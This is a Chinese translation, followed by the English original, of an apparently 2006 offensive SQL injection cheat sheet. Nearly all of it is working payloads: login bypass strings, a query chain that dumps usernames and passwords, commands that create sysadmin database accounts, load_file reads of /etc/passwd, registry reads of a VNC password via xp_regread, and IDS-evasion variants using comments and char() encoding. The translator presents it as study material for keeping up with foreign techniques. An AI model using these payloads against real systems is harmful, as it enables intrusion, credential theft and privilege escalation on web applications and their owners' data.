[翻譯]SQL注射技術總結文檔

[翻譯]SQL注射技術總結文檔

 

++++++++++++++++++++++++++++

      By zeroday.                

      zeroday [ at ] blacksecurity.org

---------------------------------------------

      翻譯：浪跡天.Iceskysl@1.S.T

      Iceskysl_At_www.iceskysl.net

      時間：2006.5.21

 

寫在前面：

最近看了很多老外寫的東西，看時間相同的技術當鋪比咱們早了好長一段時間，好比ASP的SQL注射國外02年就出現了，PHP的也在04年出現，而咱們一直到05年才接觸到，看看比人家晚了多少時間呀！

爲了儘快瞭解最新的技術動態，我堅持看E文資料，有的很長，有的很短，本人時間有限，不可能一一翻譯過來，只能挑選本身認爲比較適合你們看的東西翻譯過來，但願你能從中學到東西。

 

PS：本人英語水平有限，不少都是按照個人理解作的模糊翻譯，如有不當，敬請指正，謝謝！

 

====||目錄||=====

--------------------

1、簡介

2、漏洞測試

3、收集信息

4、數據類型

5、抓取密碼

6、建立數據庫賬號

7、MYSQL利用

8、服務名和配置

9、在註冊表中找VNC密碼

10、刺穿IDS認證

11、在MYSQL中使用char()欺騙

12、用註釋躲避IDS認證

13、構造無引號的字符串

 

====||文章開始||====

1、簡介

當你看到一個服務器只開了80端口，這在必定程度上說明管理員把系統的補丁作的很好，咱們所要作最有效的攻擊則也應該轉向WEB攻擊。SQL注射是最經常使用的攻擊方式。你攻擊WEN系統（ASP，PHP，JSP，CGI等）比去攻擊系統或者其餘的系統服務要簡單的多。

SQL注射是經過頁面中的輸入來欺騙使得其能夠運行咱們構造的查詢或者別的命令，咱們知道在WEB上面有不少供咱們輸入參數的地方，好比用戶名、密碼或者E_mail。

 

2、漏洞測試

最開始咱們應該從最簡單的來試：

- Login:' or 1=1--

- Pass:' or 1=1--

- http://website/index.asp?id=' or 1=1--

還有下面這樣的方式：

- ' having 1=1--

- ' group by userid having 1=1--

- ' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'tablename')--

- ' union select sum(columnname) from tablename--

 

3、收集信息

- ' or 1 in (select @@version)--

- ' union all select @@version--

上面就能夠獲得系統的版本和補丁信息。

 

4、數據類型

Oracle數據庫>>

-->SYS.USER_OBJECTS (USEROBJECTS)

-->SYS.USER_VIEWS

-->SYS.USER_TABLES

-->SYS.USER_VIEWS

-->SYS.USER_TAB_COLUMNS

-->SYS.USER_CATALOG

-->SYS.USER_TRIGGERS

-->SYS.ALL_TABLES

-->SYS.TAB

MySQL數據庫

-->mysql.user

-->mysql.host

-->mysql.db

 

MS access數據

-->MsysACEs

-->MsysObjects

-->MsysQueries

-->MsysRelationships

 

MS SQL Server數據庫

-->sysobjects

-->syscolumns

-->systypes

-->sysdatabases

 

5、抓取密碼

用相似下面的語句。。。

//保存查詢的結果

step1 : '; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login > @var select @var as var into temp end --

//取得信息

step2 : ' and 1 in (select var from temp)--

//刪除臨時表

step3 : ' ; drop table temp --

 

6、建立數據庫賬號

MS SQL

exec sp_addlogin 'name' , 'password'

exec sp_addsrvrolemember 'name' , 'sysadmin'

 

MySQL

INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))

 

Access

CRATE USER name IDENTIFIED BY 'pass123'

 

Postgres (requires Unix account)

CRATE USER name WITH PASSWORD 'pass123'

 

Oracle

CRATE USER name IDENTIFIED BY pass123

       TEMPORARY TABLESPACE temp

        DEFAULT TABLESPACE users;

GRANT CONNECT TO name;

GRANT RESOURCE TO name;

 

7、MYSQL交互查詢

使用Union查詢，暴出文件代碼，以下：

  - ' union select 1,load_file('/etc/passwd'),1,1,1;

 

8、系統服務名和配置

- ' and 1 in (select @@servername)--

- ' and 1 in (select servername from master.sysservers)--

 

9、找到VNC密碼（註冊表）

實驗語句以下：

- '; declare @out binary(8)

- exec master..xp_regread

- @rootkey = 'HKEY_LOCAL_MACHINE',

- @key = 'SOFTWARE\ORL\WinVNC3\Default',

- @value_name='password',

- @value = @out output

- select cast (@out as bigint) as x into TEMP--

- ' and 1 in (select cast(x as varchar) from temp)--

 

10、避開IDS檢測

Evading ' OR 1=1 Signature

 

- ' OR 'unusual' = 'unusual'

- ' OR 'something' = 'some'+'thing'

- ' OR 'text' = N'text'

- ' OR 'something' like 'some%'

- ' OR 2 > 1

- ' OR 'text' > 't'

- ' OR 'whatever' in ('whatever')

- ' OR 2 BETWEEN 1 and 3

 

11、MYSQL中使用char()函數

不帶引號的注射，例如： (string = "%"):

--> ' or username like char(37);

帶引號的注射，例如： (string="root"):

--> ' union select * from users where login = char(114,111,111,116);

在 unions中使用load files 函數，例如：(string = "/etc/passwd"):

-->' union select 1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;

檢查文件是否存在，例如： (string = "n.ext"):

-->' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));

 

12、利用註釋符號避開IDS

舉例以下：

-->'/**/OR/**/1/**/=/**/1

-->Username:' or 1/*

-->Password:*/=1--

-->UNI/**/ON SEL/**/ECT  （！！！這個比較罕見，應該大有做爲！！！）

-->(Oracle)     '; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'

-->(MS SQL)    '; EXEC ('SEL' + 'ECT US' + 'ER')

 

13、不帶引號的字符串

用char()或者0X來構造不含引號的語句。。

--> INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72), 0x64)

 

 

======================================================================

附錄原文：

                             

    Sql Injection Paper                      

     By zeroday.                  

     zeroday [ at ] blacksecurity.org 

 

       1.Introduction.

       2.Testing for vulnerabilities.

       3.Gathering Information.

       4.Data types.

       5.Grabbing Passwords.

       6.Create DB accounts.

       7.MySQL OS Interaction.

       8.Server name and config.

       9.Retrieving VNC password from registry.

       10.IDS Signature Evasion.

       11.mySQL Input Validation Circumvention using Char().

       12.IDS Signature Evasion using comments.

       13.Strings without quotes.

 

1. When a box only has port 80 open, it's almost certain the admin will patch his server,

The best thing to turn to is web attacks. Sql Injection is one of the most common web attacks.

You attack the web application, ( ASP, JSP, PHP, CGI..etc) rather than the webserver

or the services running on the OS.

Sql injection is a way to trick using a qurey or command as a input via webpages,

most websites take parameters from the user like username and passwrod or even their emails.

They all use Sql querys.

 

2. First of you should start with something simple.

- Login:' or 1=1--

- Pass:' or 1=1--

- http://website/index.asp?id=' or 1=1--

These are simple ways to try another ones are:

- ' having 1=1--

- ' group by userid having 1=1--

- ' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'tablename')--

- ' union select sum(columnname) from tablename--

 

3.Gathering Infomation.

- ' or 1 in (select @@version)--

- ' union all select @@version--

Those will Find the actual Version of the computer, OS/service pack.

 

4.Data types.

 

Oracle

-->SYS.USER_OBJECTS (USEROBJECTS)

-->SYS.USER_VIEWS

-->SYS.USER_TABLES

-->SYS.USER_VIEWS

-->SYS.USER_TAB_COLUMNS

-->SYS.USER_CATALOG

-->SYS.USER_TRIGGERS

-->SYS.ALL_TABLES

-->SYS.TAB

 

MySQL

-->mysql.user

-->mysql.host

-->mysql.db

 

MS access

-->MsysACEs

-->MsysObjects

-->MsysQueries

-->MsysRelationships

 

MS SQL Server

-->sysobjects

-->syscolumns

-->systypes

-->sysdatabases

 

5.Grabbing passwords

 

'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login > @var select @var as var into temp end --

 

' and 1 in (select var from temp)--

 

' ; drop table temp --

 

6.Create DB accounts.

 

MS SQL

exec sp_addlogin 'name' , 'password'

exec sp_addsrvrolemember 'name' , 'sysadmin'

 

MySQL

INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))

 

Access

CRATE USER name IDENTIFIED BY 'pass123'

 

Postgres (requires Unix account)

CRATE USER name WITH PASSWORD 'pass123'

 

Oracle

CRATE USER name IDENTIFIED BY pass123

       TEMPORARY TABLESPACE temp

        DEFAULT TABLESPACE users;

GRANT CONNECT TO name;

GRANT RESOURCE TO name;

 

7.MySQL OS Interaction

 

- ' union select 1,load_file('/etc/passwd'),1,1,1;

 

8.Server name and config.

 

- ' and 1 in (select @@servername)--

- ' and 1 in (select servername from master.sysservers)--

 

9.Retrieving VNC password from registry.

 

- '; declare @out binary(8)

- exec master..xp_regread

- @rootkey = 'HKEY_LOCAL_MACHINE',

- @key = 'SOFTWARE\ORL\WinVNC3\Default',

- @value_name='password',

- @value = @out output

- select cast (@out as bigint) as x into TEMP--

- ' and 1 in (select cast(x as varchar) from temp)--

 

10.IDS Signature Evasion.

Evading ' OR 1=1 Signature

 

- ' OR 'unusual' = 'unusual'

- ' OR 'something' = 'some'+'thing'

- ' OR 'text' = N'text'

- ' OR 'something' like 'some%'

- ' OR 2 > 1

- ' OR 'text' > 't'

- ' OR 'whatever' in ('whatever')

- ' OR 2 BETWEEN 1 and 3

 

11.mySQL Input Validation Circumvention using Char().

 

Inject without quotes (string = "%"):

--> ' or username like char(37);

Inject with quotes (string="root"):

--> ' union select * from users where login = char(114,111,111,116);

load files in unions (string = "/etc/passwd"):

-->' union select 1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;

Check for existing files (string = "n.ext"):

-->' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));

 

12.IDS Signature Evasion using comments.

 

-->'/**/OR/**/1/**/=/**/1

-->Username:' or 1/*

-->Password:*/=1--

-->UNI/**/ON SEL/**/ECT

-->(Oracle)     '; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'

-->(MS SQL)    '; EXEC ('SEL' + 'ECT US' + 'ER')

 

13.Strings without quotes.

--> INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72), 0x64)

 

Greets: kaneda, modem, wildcard, #black and pulltheplug.